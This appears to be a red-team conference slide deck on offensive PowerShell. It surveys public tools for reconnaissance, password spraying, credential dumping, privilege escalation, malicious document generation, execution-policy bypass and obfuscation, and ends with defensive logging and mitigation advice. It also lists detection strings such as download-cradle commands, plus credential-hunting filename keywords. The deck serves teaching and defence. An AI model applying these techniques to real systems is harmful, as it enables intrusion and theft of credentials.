This document provides an overview of using PowerShell for offensive security purposes. It discusses PowerShell syntax, common commands, and various open source tools and frameworks like PowerSploit, Empire, BloodHound, and Nishang that can be used for tasks like reconnaissance, gaining access, maintaining access, and privilege escalation on Windows systems. The document also provides examples of using PowerShell to bypass execution policies and obfuscate scripts to avoid detection.
2. PS C:> whoami.ps1_
• Arthur Paixão
• Red Team Security Specialist – C6 Bank
• Information Security - UNIFG
• Analysis Systems Development – UNIBRATEC
• Made in Recife #Oxem? #TuVisse?
• Security Research at #RTFM
4. PS C:> overview.ps1_
Why use
Powershell?
Native on
Windows
.NET
Framework
Easy to
learn
Execute
code in
memory
Command-
line Shell
and Script
PowerShell
ISE
8. PS C:> syntax-overview.ps1_
Basic CmdLets
PowerShell PowerShell Alias CMD *nix
Get-ChildItem ls, gci, dir dir ls
Copy-Item cp, copy, cpi copy cp
Move-Item move, mv, mi move mv
Select-String sls find, findstr grep
Get-Help man, help help man
Get-Content cat, gcc, type type cat
9. PS C:> syntax-overview.ps1_
• Creates a new resource
New
• Modifies an existing resource
Set-
• Retrieves an existing resource
Get-
• Gets information from a source, such as a file
Read-
• Used to look for an object
Find-
• Used to create a reference to a resource
Search-
• (asynchronous) begin an operation, such as starting a process
Start-
• (synchronous) perform an operation such as running a command
Invoke-
10. PS C:> syntax-verview.ps1_
Get-Help
Default output isn’t really
useful
Get-Help ls –ex
Get-Help ls -Full
Get-Command
Very useful for find cmdlet
Get-Command Get-Help
Get-Command Set-Acl
14. PS C:> Get-Help-RedTeam.ps1_
• PowerShell is what the admins use to manage their infrastructure;
• Standard on Windows 7 and up;
• Microsoft is pushing more and more tasks into PowerShell;
• PowerShell can be used in every part of the attack lifecycle;
• Access to entire .NET and WMI frameworks;
• Lots of very interesting offensive projects going on;
15. PS C:> Get-Help-BlueTeam.ps1_
• It’s what the bad guys (RedTeams) are using;
• There’s some really cool DFIR stuff going on with Powershell;
• Module Logging (v3);
• Script Block Logging (v5);
• Full Transcription Logging (v2, impoved in v5);
• Preventing and Monitore downgrade attacks;
• Monitor and alert on certain strings/commands in command line
arguments for powershell.exe
• -EncodedCommand
• (New-Object Net.WebClient).DownloadString
PS C:> Get-Help-BlueTeam.ps1_
• It’s what the bad guys (RedTeams) are using;
• There’s some really cool DFIR stuff going on with Powershell;
• Module Logging (v3);
• Script Block Logging (v5);
• Full Transcription Logging (v2, impoved in v5);
• Preventing and Monitore downgrade attacks;
• Monitor and alert on certain strings/commands in command line
arguments for powershell.exe
• -EncodedCommand
• (New-Object Net.WebClient).DownloadString
19. PS C:> PSNmap.ps1_
• Linux nmap for PowerShell
(almost).
• Ping sweeps and scans a
network for specified open
ports.
• Can also perform DNS
lookups.
• Author(s)
• @joakimbs
• https://www.powershellgallery.com/packages/PSnmap/1.2
20. PS C:> PowerMeta.ps1_
• Discover publicly available files
• Extract Metadata from them
• Can provide information about:
• The internal username schema
• System names
• Domain info
• Author(s):
• Beau Bullock (@dafthack)
• https://github.com/dafthack/PowerMeta
Full Names
Possible
Username
21. PS C:> OWAAttackFlow.ps1_
Starting With
Nothing and
100% Remote
Reconnaissance
OWA Target
Aquisition
Internal Domain
Enumeration
Username
Contention
Discovery
Username
Enumeration
Password
Spraying
Acquire Global
Address List
More Password
Spraying
2FA Bypass to
Search Email
Congratulation,
now you're
H4ck3R!!!
22. PS C:> MailSniper.ps1_
• Enumerate users/domain
• Password spray OWA/EWS
• Get Global Address List
• Search email for certain terms
• Passwords
• Find VPN info
• Reset 2FA keys or add new
device
• Author(s):
• Beau Bullock (@dafthack)
• https://github.com/dafthack/MailSniper
24. PS C:> PowerShell-Empire.ps1_
• PowerShell post-exploitation
agent
• Aims to provide a rapidly
extensible platform to integrate
offensive/defensive PowerShell
work
• Many capabilities:
• Stagers/payloads, Lateral movement,
persistence, etc.
• Author(s):
• Will Schroeder (@harmj0y)
• Justin Warner (@sixdub)
• Matt Nelson (@enigma0x3)
• www.powershellempire.com
25. PS C:> LuckyStrike.ps1_
• PowerShell based generator of
malicious .doc and .xls documents;
• All payloads are saved into a
database for easy retrieval &
embedding into a new or existing
document;
• Is a menu-driven PowerShell script
that uses a sqlite database to store
your payloads, code block
dependencies, and working sessions
in order to generate malicious
documents.
• Author(s):
• Jason Lang (@curi0usJack)
• https://github.com/curi0usJack/luckystrike
29. PS C:> PowerUp.ps1_
• Performs a number of
local privilege escalation
checks
• Checks for:
• Unquoted service paths
• Unattended Install Files
• Service Permissions
• Author(s):
• Will Schroeder (@harmj0y)
• https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
30. PS C:> PowerUpSQL.ps1_
• SQL server discovery
• Audit weak configurations
• Perform privilege escalation to
obtain SA privileges
• Find sensitive data at scale
• Attacks Funcions:
• Invoke-SQLDumpInfo
• Invoke-SQLAudit
• Invoke-SQLEscalatePriv
• Author(s):
• ScottSutherland(@_nullbind)
• https://github.com/NetSPI/PowerUpSQL
32. PS C:> Get-GPPPassword.ps1_
• Finds any passwords of
accounts set by GPP
• Usually the first thing I
check
• Almost always find an
admin password here
• Author(s):
• Chris Campbell (@obscuresec)
• https://github.com/PowerShellMafia/PowerSplo
it/blob/master/Exfiltration/Get-
GPPPassword.ps1
33. PS C:> BloodHound.ps1_
• Enumerates/Gathers:
• Local admins group on all systems
• Active user sessions on each
system
• Group membership information
• Domain trusts info
• Find a path to domain admin
• Authors(s):
• Andrew Robbins (@_wald0), Will
Schroeder (@harmj0y) and
Rohan Vazarkar (@CptJesus)
• https://github.com/BloodHoundAD/BloodHound
• https://github.com/SadProcessor/SomeStuff/blob/
master/BloodHoundw64_LTI.ps1 [Windows Edition]
34. PS C:> Find-LocalAdminAccess.ps1_
• Find a system on the
network your user is a
local admin of;
• Author(s):
• Will Schroeder (@harmj0y)
• https://github.com/Powe
rShellMafia/PowerSploit/
blob/master/Recon/Powe
rView.ps1
35. PS C:> Find-LocalAdminAccess.ps1_
• Tool for password spraying all
domain users
• Common Scenario:
• Domain locks out accounts after a
certain number of failed logins
• Can’t brute force
• Solution:
• Try a number of passwords less than the
domain lockout policy against EVERY
account in the domain
• Author(s):
• Beau Bullock (@dafthack)
• https://github.com/dafthack/Do
mainPasswordSpray
37. PS C:> Invoke-Mimikatz.ps1_
• Dump cleartext credentials
• Avoids writing to disk
• Could sneakily dump creds
from LSASS dumps from
other systems
• Author(s):
• Joe Bialek (@JosephBialek)
• Benjamin Delpy (@gentilkiwi)
• https://raw.githubusercontent.com/PowerShellMafia/Power
Sploit/master/Exfiltration/Invoke-Mimikatz.ps1
38. PS C:> Invoke-ShareFinder.ps1_
• Sensitive files on shares?
• ShareFinder then FileFinder
• FileFinder will find files
with the following strings in
their title:
• ‘*pass*’, ‘*sensitive*’,
‘*admin*’, ‘*secret*’,
‘*login*’, ‘*unattend*.xml’,
‘*.vmdk’, ‘*creds*’, or
‘*credential*’
• Author(s):
• Will Schroeder (@harmj0y)
42. PS C:> PowerOps.exe_
• C# application that has many
• PowerShell scripts built in:
• PowerSploit
• Nishang
• GPPPassword
• Empire
• PowerCat
• Author(s):
• Rui Reis (@fdiskyou)
• https://github.com/fdiskyou/PowerOPS
43. PS C:> PowerShdll.ps1_
• Run PowerShell with dlls
only. Does not require
access to powershell.exe
as it uses powershell
automation dlls.
• Requirements:
• .Net v3.5 for dll mode.
• .Net v2.0 for exe mode.
• https://github.com/p3nt4/PowerShdll
DLL Mode:
EXE Mode:
44. PS C:> PowerLessShell.py_
• PowerLessShell rely on MSBuild.exe
to remotely execute PowerShell
scripts and commands without
spawning powershell.exe. You can
also execute raw shellcode using the
same approach.
• To add another layer of crap the
payload will copy msbuild.exe to
something random and build the
payload using the randomly
generated binary.
• You can provide -knownprocess switch to
use known Windows process name instead
of renaming MsBuild.exe to something
random
• https://github.com/Mr-Un1k0d3r/PowerLessShell
48. PS C:> Invoke-BypassExecutionPolicy.ps1_
• Set the ExcutionPolicy for the CurrentUser Scope via the Registry
• https://blog.netspi.com/15-ways-to-bypass-the-
powershell-execution-policy/
• https://docs.microsoft.com/en-
us/powershell/module/microsoft.powershell.security/set-
executionpolicy?view=powershell-5.1
50. PS C:> S3t-0+‘B’+fu$C4t|0n.ps1_
• Command line args are what
most monitoring tools alert on
when powershell.exe is run
• ‘LeT’+’s’+’ob’+’FusCa’+’te’
• Encode, concatenate, reorder,
etc.
• Author(s):
• Daniel Bohannon (@danielbohannon)
• https://github.com/danielbohannon/Invoke-Obfuscation
51. PS C:> ISESteriods.ps1_
• ISESteroids 2.5.1.0 now ships with a
PowerShell obfuscator that can scramble
your code and make it hard to reverse-
engineer;
• To obfuscate a script, simply load a script
and choose Tools/Obfuscate;
• Dialog where you can set the level of
obfuscation;
• http://www.powertheshell.com/powershell-obfuscator/
53. PS C:> Nishang.ps1_
• Nishang is a framework and collection of
scripts and payloads which enables usage of
PowerShell for offensive security,
penetration testing and red teaming.
• Nishang is useful during all phases of
penetration testing.
• ActiveDirectory
• Antak - the Webshell
• Backdoor
• Bypass
• Clients
• Escalation
• MITM
• Pivot
• https://github.com/samratashok/nishang
54. PS C:> PowerSploit.ps1_
• PowerSploit is a collection of Microsoft
PowerShell modules that can be used to
aid penetration testers during all phases
of an assessment. PowerSploit is
comprised of the following modules and
scripts:
• Recon / CodeExecution
• ScriptModification
• Persistence
• AntivirusBypass
• Exfiltration
• Mayhen =)
• PrivEsc
• https://github.com/PowerShellMafia/Po
werSploit
55. PS C:> PS>Attack.ps1_
• PS>Attack combines some of the best
projects in the infosec powershell
community into a self contained custom
PowerShell console.
• It's designed to make it easy to use
PowerShell offensively and to evade antivirus
and Incident Response teams.
• Contains over 100 commands for Privilege
Escalation, Recon and Data Exfilitration. It
does this by including the following modules
and commands:
• PowerSploit
• Nishang
• Powercat
• Inveigh
• Invoke-TheHash
• https://github.com/jaredhaight/PSAttack
58. PS C:> Get-Mitigation.ps1_
• Possible Bypass!
Disable:
• Possible Bypass!
Use AppWhitelisting.
• Possible Bypass!
Use Sysmon to monitor and alert for System.Management.Automation.dll
• Dangerous!
Could possibly disable csc.exe compilation tool.
Remove PowerShell v2 and Install PowerShell v5.
• PS C:> $ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"
Constrained Language Mode